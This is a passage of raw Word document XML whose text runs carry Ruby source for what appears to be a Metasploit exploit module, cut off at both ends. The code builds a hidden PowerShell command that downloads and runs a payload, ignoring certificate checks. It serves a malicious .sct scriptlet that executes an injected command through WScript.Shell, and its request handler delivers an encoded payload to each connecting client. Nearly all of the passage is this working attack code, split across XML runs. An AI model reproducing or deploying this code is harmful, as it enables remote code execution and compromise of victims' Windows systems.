      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-FILENAME']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D450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5BFEC00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# Set path (Use %TEMP% if empty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571A21F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path = datastore['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BinaryEXE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-PATH'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>].blank</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>? ? “$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>env:temp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>” : %Q(‘#{datastore['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BinaryEXE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-PATH']}’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2094DA0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097C9F8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# Join Path and Filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D00A9E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file = %</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Q(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>echo (#{path}+’\\#{filename}’))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D81DA2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299BEE7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# Generate download PowerShell command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E17A69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r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>download_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Rex::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PshMethods.download_run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5ECF8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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4BBA9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30412EA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download_and_run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = “#{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ignore_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>download_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA8B98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16E2549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# Generate main PowerShell command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D4424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return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>generate_psh_command_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>line</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>noprofile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: true, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>windowstyle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: ‘hidden’, command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>download_and_run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FF8FB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67380A0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6BE4DBF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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on_request_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>uri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cli, _request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D7BE51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if _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>request.raw_uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> =~ /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>$/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AD01C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r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>print_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>status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“Handling request for .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> from #{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cli.peerhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08299BF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payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gen_psh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(“#{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>get_uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}”, “string”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F510B7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data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gen_sct_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2331336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r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>response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cli, data, ‘Content-Type’ =&gt; ‘text/plain’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318CBDF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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5FBF1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r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>print_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>status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“Delivering payload to #{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cli.peerhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}…”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173378F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p = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>regenerate_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(cli)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB4E69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data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cmd_psh_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>p.encoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FDF0B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               </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>payload_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>instance.arch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.first</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530769A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               </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>remove_comspec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6C093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               </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exec_in_place</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AAB15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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62241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spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>response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cli, data, ‘Content-Type’ =&gt; ‘application/octet-stream’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0F0C9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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0862402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3C44602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26298A4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22AB15B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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rand_class_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="186D0FB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“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Rex::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Text.rand_text_hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8}-#{Rex::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Text.rand_text_hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4}-#{Rex::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Text.rand_text_hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4}-#{Rex::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Text.rand_text_hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4}-#{Rex::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Text.rand_text_hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12}”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0060C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488CA95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5748AD7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1A349A8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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gen_sct_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F19327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# If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2D28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if command =</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>= ”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B428AA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return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;?XML version=”1.0″?&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>scriptlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&lt;registration </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>progid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=”#{Rex::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Text.rand_text_alphanumeric</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8}” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>classid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=”{#{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rand_class_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}}”&gt;&lt;/registration&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>scriptlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CF440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# If a command is provided, tell the target system to execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74717BF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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD67C8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return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;?XML version=”1.0″?&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>scriptlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&lt;registration </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>progid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=”#{Rex::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Text.rand_text_alphanumeric</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8}” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>classid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=”{#{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rand_class_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">}}”&gt;&lt;script&gt;&lt;![CDATA[ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]&gt;&lt;/script&gt;&lt;/registration&gt;&lt;/scriptlet&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57732E3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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C09D3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105B36E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1655BDC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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>retrieve_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(filename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725EDCF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if (not datastore['INJECT_PATH'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>].nil</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C50408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path = “#{datastore['INJECT_PATH']}”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC96A6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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630454C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path = nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3834277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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DBA2C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if (not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>path.nil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C017BB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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54903">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
